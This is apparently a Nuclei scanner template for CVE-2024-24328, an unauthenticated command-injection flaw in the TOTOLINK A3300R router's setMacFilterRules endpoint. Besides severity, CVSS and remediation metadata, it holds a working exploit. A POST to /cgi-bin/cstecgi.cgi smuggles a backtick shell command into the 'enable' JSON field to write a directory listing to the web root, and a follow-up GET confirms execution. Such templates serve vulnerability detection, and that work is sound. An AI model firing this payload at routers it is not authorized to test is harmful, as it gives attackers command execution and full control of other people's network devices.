id: CVE-2024-24328 info: name: TotoLink Router setMacFilterRules - Command Injection author: pussycat0x severity: critical description: | TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setMacFilterRules function. impact: | Unauthenticated attackers can execute arbitrary OS commands via the enable parameter, potentially compromising the entire TOTOLINK router. remediation: | Update TOTOLINK A3300R firmware to a version newer than V17.0.0cu.557_B20221024. reference: - https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/12/TOTOlink%20A3300R%20setMacFilterRules.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-24328 cwe-id: CWE-78 epss-score: 0.84416 epss-percentile: 0.9934 cpe: cpe:2.3:o:totolink:a3300r_firmware:17.0.0cu.557_b20221024:*:*:*:*:*:*:* metadata: vendor: totolink product: a3300r_firmware fofa-query: title="totolink" tags: cve,cve2024,totolink,routers,unauth,intrusive,vkev,vuln http: - raw: - | POST /cgi-bin/cstecgi.cgi?token= HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Origin: {{RootURL}} Referer: {{RootURL}}/advance/portfwd.html?token= {"enable":"1`ls>/web/{{randstr}}.txt`","addEffect":"0","topicurl":"setMacFilterRules"} - | GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} Referer: {{RootURL}}}}/advance/portfwd.html?token= matchers: - type: dsl dsl: - 'status_code_1 == 200 && status_code_2 == 200' - 'contains(body_1, "\"success\":true") && contains_all(body_2, "bin","etc")' condition: and # digest: 4a0a004730450221008e001fad6638ca1ef0344133f9bee169441bad5d9a0e29ea08620d232958de7c02203c1705e83957ac2b5fe14b0faebce4ee9db1be7096749fe543f8fdf8ef8f3d35:922c64590222798bb761d5b6d8e72950